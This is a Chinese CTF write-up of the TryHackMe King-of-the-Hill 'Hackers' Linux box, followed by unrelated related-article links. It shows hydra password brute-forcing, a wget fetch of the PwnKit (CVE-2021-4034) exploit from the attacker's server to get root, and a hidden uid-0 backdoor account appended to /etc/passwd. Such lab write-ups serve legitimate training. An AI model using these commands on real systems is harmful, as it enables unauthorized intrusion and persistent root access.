TryHackMe-Koth-Hackers-Linux
Koth Hackers - Linux
King of the hill
进攻
nmap 扫:
nmap -sS 10.10.122.117 -sV21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
9999/tcp open abyss?
ftp有东西
披露了有用户存在弱密码
rcampbell:Robert M. Campbell:Weak password
gcrawford:Gerard B. Crawford:Exposing crypto keys, weak password
爆破:
hydra -l rcampbell -P /usr/share/wordlists/rockyou.txt 10.10.122.117 ftp
.
结果:
[21][ftp] host: 10.10.122.117 login: rcampbell password: lipgloss
gobuster爆破http目录
/backdoor
robots.txt暴露用户名:
plaguehydra -l plague -P /usr/share/wordlists/rockyou.txt 10.10.122.117 http-post-form "/api/user/login:username=plague&password=^PASS^:Incorrect credentials"
尝试爆破,爆了很久,爆不出
ftp的那两个弱密码爆出来了,拿去登ssh,成功
CVE-2021-4034
find / -type f -perm -u+s 2>/dev/null
发现pkexec
pkexec具有suid
尝试pwnkit利用。传入exp
攻击机:python3 -m http.server 8000
目标:wget http://10.14.39.48:8000/PwnKitchmod 777 ./PwnKit./PwnKit
成功getroot
防守(漏洞修补):
拿到root先把那两个弱密码的两个用户密码全改了。
openssl生成密码hash:
openssl passwd -1 -salt hack 1q2w3e4recho 'sugo:$1$hack$eu7wA.3faDMt9Z2srODT9/:0:0:root:/root:/bin/bash' >> /etc/passwd
留后手
把/etc/sudoers的内容全清
Capabilitie清除
getcap -r / 2>/dev/null
发现存在:
/usr/bin/python3.6 = cap_setuid+ep
/usr/bin/python3.6m = cap_setuid+ep
使用命令将其清除:
setcap -r
Pkexec suid
由于我们也是利用pwnkit进来的,所以我们需要把pkexec的suid清掉,以免其他选手以此getroot:
chmod -u-s
愉快找flag…
TryHackMe-Koth-Hackers-Linux相关推荐
- Linux专家警告开源软件日益吸引黑客
Linux expert warns of open source's growing appeal to hackers Linux专家警告开源软件日益吸引黑客 <purple endurer ...
- Linux Hackers/Suspicious Account Detection
catalog 1. Linux黑客帐号攻击向量2. Linux可疑帐号检测模型 1. Linux黑客帐号攻击向量 0x1: 将黑客帐号添加到"root"组 1. useradd ...
- 学习笔记之Linux Basics for Hackers【(美)OccupyTheWeb 著】
第一章:基础知识学习 一.术语解释 二进制文件:此术语是指可以执行的文件,二进制文件通常位于/ usr/bin 或 usr/sbin 目录中,包括 ps,cat,ls 和 cd 等实用程序以及无线应 ...
- linux basics for hackers
9.解压缩 对于组合文件, tar 是首选命令, 并且您至少有三个实用程序可以使用不同的压缩比压缩文件--gzip. bzip2 和 compression. dd 命令超越 了这个范围.它使您能够在 ...
- Linux驱动程序编写
工作需要写了我们公司一块网卡的Linux驱动程序.经历一个从无到有的过程,深感技术交流的重要.Linux作为挑战微 软垄断的强有力武器,日益受到大家的喜爱.真希望她能在中国迅速成长.把程序文档贴出来, ...
- Linux网卡驱动程序编写
Linux网卡驱动程序编写 [摘自 LinuxAID] 工作需要写了我们公司一块网卡的Linux驱动程序.经历一个从无到有的过程,深感技术交流的重要.Linux作为挑战微软垄断的强有力武器,日益受到大 ...
- linux 自动提权perl脚本
linux各种版本的 exp地址:http://dl.packetstormsecurity.net/UNIX/penetration/rootkits/var.txt 使用demo yaseng@U ...
- [linux] Linux日志设置(转自抚琴煮酒)
进行任何Linux系统设置时首先要做的事就是--备份配置文件!!!! 一.syslog.conf的设置 目前,linux依旧使用syslogd作为日志监控进程,对其进行必要的配置能减少很多麻烦,并且可 ...
- Google怎么用linux
今年的linux内核开发大会上,google的开发人员也上台做了名为"how google use linux"的演讲.我斗胆翻译注解一番――括号内为注解,欢迎读者斧正. 原文链接 ...
最新文章
- iota和左移右移的用法
- 基于Javaweb实现实验室设备管理系统
- unittest中的测试固件
- matlab 开 闭 代码,C++中的MATLAB函数〔闭锁〕
- 《神经网络:回到未来》(Neural Nets Back to the Future)-ICML 2016
- 前端学习(270):百度弹性导航
- elasticsearch 6.x (一) 部署 windows入门 spingboot连接
- python与数据库完整项目_python入门:操作数据库项目实例分享
- 【leetcode】排序题(python)
- 洪峰:泛系、自由与“一、百、万”工程(一)
- 开源机器学习项目的简单介绍
- 陈坤发微博调侃 回应儿子生母话题
- 面试知识储备:新浪微博Android客户端的实现
- 我和权威的故事——王垠
- 成长中必知的20个故事[转]
- jQuery圆点slider轮播插件
- 书摘—拆掉思维里的墙
- android应用是非正式版本,华为手机自带浏览器,应用是非正式发布版本,当前设备不支持安装
- 手机拍照要注意光线问题
- Redis 缓存穿透、击穿、雪崩 解决方法
热门文章
- 2023最新STM32毕业设计项目集合
- Android Jcenter 依赖完整版
- 编程界神级人物聚于这里,带你领略什么叫聪明的脑袋不长毛
- Java实现二维码和文字合成一张新图片
- TensorFlow的Saver保存类
- 用matlab计算八木天线增益,matlab控制运算精度函数digits(A)和vpa(B)的使用方法
- css app 返回箭头,css 向左向下箭头
- 讯飞语音合成和百度语音合成,粘贴就能用
- 搭建RocketMQ踩的坑- No name server address
- c语言英语词典设计案例,c语言课程设计-电子英汉词典(含源码).doc